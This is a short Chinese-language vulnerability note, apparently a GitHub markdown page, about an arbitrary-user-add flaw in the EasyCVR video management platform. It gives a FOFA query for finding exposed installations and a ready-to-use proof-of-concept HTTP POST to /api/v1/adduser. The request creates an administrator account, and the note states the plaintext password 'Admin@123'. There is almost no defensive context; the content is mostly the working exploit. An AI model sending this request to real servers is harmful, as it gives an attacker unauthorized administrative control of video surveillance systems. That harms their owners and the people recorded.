EasyCVR视频管理平台存在任意用户添加漏洞

EasyCVR 视频管理平台是 TSINGSEE 青犀视频旗下一款软硬一体的产品，可提供多协议的设备接入、采集、AI 智能检测、处理、分发等服务，攻击者可通过/api/v1/adduser接口添加管理员账户

fofa

app="EasyCVR-视频管理平台"

poc

POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

0e7517141fb53f21ee439b355b5a1d0a 明文为 Admin@123

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

EasyCVR视频管理平台存在任意用户添加漏洞.md

EasyCVR视频管理平台存在任意用户添加漏洞.md

EasyCVR视频管理平台存在任意用户添加漏洞

fofa

poc

Files

EasyCVR视频管理平台存在任意用户添加漏洞.md

Latest commit

History

EasyCVR视频管理平台存在任意用户添加漏洞.md

File metadata and controls

EasyCVR视频管理平台存在任意用户添加漏洞

fofa

poc